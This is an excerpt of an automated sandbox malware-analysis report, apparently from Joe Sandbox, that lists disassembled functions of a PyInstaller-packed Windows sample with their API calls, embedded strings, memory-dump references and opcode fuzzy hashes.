                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                              • Instruction ID: 73e33365287b8dcfb7dbab4ece3cfc7ace97f0e1942f2d80710a79d2b77c3ae5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C081CC21E0C6438EFE60ABE594413BD6691AF867C0F55C435EA1D473E6DF3CE845870A
                                                                                                                                                                                                                              Function 00007FF8E7962940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                              • Instruction ID: fc1ca21bf046af5e42599f36fadebb22c15b1807ca8cdf255dc1ebc5aec1ed3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1818961E0824386FA64BBE5D44A3BD6691AF867C0F5487B5E93C873D6DE3CE8458302
                                                                                                                                                                                                                              Function 00007FF8E80D3A80 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                              • Instruction ID: 0032aa3c8e00bc03ccd2249ab17f4cc8bc8efd210ab0b8d105418ffeb466f37f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B817D21E08A438BFE50ABE5A54137D6690AF857D4F558035EA4D473E6EF3CE8058F0B
                                                                                                                                                                                                                              Function 00007FF7EAD16290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: de9c408c801e32101772736e53160e0a1d31566744e1e5ec98a3828aaa881f07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46126562E0C24386FB24FA24D1547B9B7A2FB60750FC441F7D699866CEDB3CE5408B22
                                                                                                                                                                                                                              Function 00007FF7EAD10FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: f$f$p$p$f
                                                                                                                                                                                                                              • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                              • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction ID: 2653f5c1d6cf5271562f7af52eaaaad06ad4b670c26ad9377011de4cd82377d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC127361E0C54386FB24EA24A054379F7A5FB60754FC4417BF69A46ACCDB7CED808B22
                                                                                                                                                                                                                              Function 00007FF7EAD01050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                              • Opcode ID: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
                                                                                                                                                                                                                              • Instruction ID: c179b02e8ab817fdc8e10f860ac16882aa3e4fbaf717dbd76427642e37a46e0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB418E61A0865282FA04FB51A8407B9E396FF54B88FC444B3ED4C4778ADE3CE545C362
                                                                                                                                                                                                                              Function 00007FF7EAD08660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD08704
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0870A
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0874C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08830: GetEnvironmentVariableW.KERNEL32(00007FF7EAD0388E), ref: 00007FF7EAD08867
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD08830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7EAD08889
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD18238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD18251
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                              • Instruction ID: 3f3a38a82d29616b10cb8db9ac92c9c84d55e9d54d752fc36843bf9f2c64cb85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43419C61A1964244FA11F721A8A53FEA392EF98788FC001B3ED0D477DEDE7CE401C262
                                                                                                                                                                                                                              Function 00007FF8E7A37250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                              • API String ID: 1666080152-331183818
                                                                                                                                                                                                                              • Opcode ID: 77200f37a822fc3e73c83f341b3da985b146b72dba8e7c2f48b7546d64b2c977
                                                                                                                                                                                                                              • Instruction ID: 5d19bea2b8ca4e714c87887bcc9119477ddcf1a335a7bf60d55b50497938d0a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77200f37a822fc3e73c83f341b3da985b146b72dba8e7c2f48b7546d64b2c977
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDD1DF72B0C68256FB658F99D48277E66D0FB45BC0F144036EAAE93794DF3CE8418B02
                                                                                                                                                                                                                              Function 00007FF7EAD0EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                              • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction ID: 05464cc64c94789c6e6be47188418392d33ad4dfff48b3357dbd55191c3470ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28D19132A087418AFB20EB25D4843ADB7A5FB54B8CF900176DE8D5779ACF38E080C752
                                                                                                                                                                                                                              Function 00007FF8E7A22536 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 214COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007A3420ErrorF9060Last
                                                                                                                                                                                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                              • API String ID: 4113039813-502574948
                                                                                                                                                                                                                              • Opcode ID: 4c073ab51f1f5d45694974e7a6ca66fe17bac0b484b9deae977fc5280a2839ef
                                                                                                                                                                                                                              • Instruction ID: 90b0b325f9553e9d5336b03bb081c19c19d51cdfc7d5970b7d6aad9e7d3dfc1d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c073ab51f1f5d45694974e7a6ca66fe17bac0b484b9deae977fc5280a2839ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C919F61B1CA8292FA55AFE1F4133BE6251EF85BC4F840035EA6E47B96DF3CE4518702
                                                                                                                                                                                                                              Function 00007FF7EAD1ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,000001DCB39E98F8,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE8C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,000001DCB39E98F8,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE98
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction ID: b39e7234e96bca1a87d7e83c421984d7c3d88e8cf35b04d14a611052094d365f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1941F265B19A1241FB16EB269800B75A399FF59B90FC8857ADD1D8738CEE3CE4058222
                                                                                                                                                                                                                              Function 00007FF8E8136234 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 113networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Ioctl
                                                                                                                                                                                                                              • String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
                                                                                                                                                                                                                              • API String ID: 3041054344-4238462244
                                                                                                                                                                                                                              • Opcode ID: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                              • Instruction ID: fa06be860fecd68539593aacb7ef9e3d79e8f3dc51b18566b737d479dbecde1f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 441793013725e27a22c0b2ab8fe50c6f096d6b0bae4d3890f8c4f5f827f12015
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38513A72B18A4299EB50CBA0E8406ED33B0FB487D8F550132EA9E93B98DF3CD554C755
                                                                                                                                                                                                                              Function 00007FF7EAD02C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF7EAD02D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
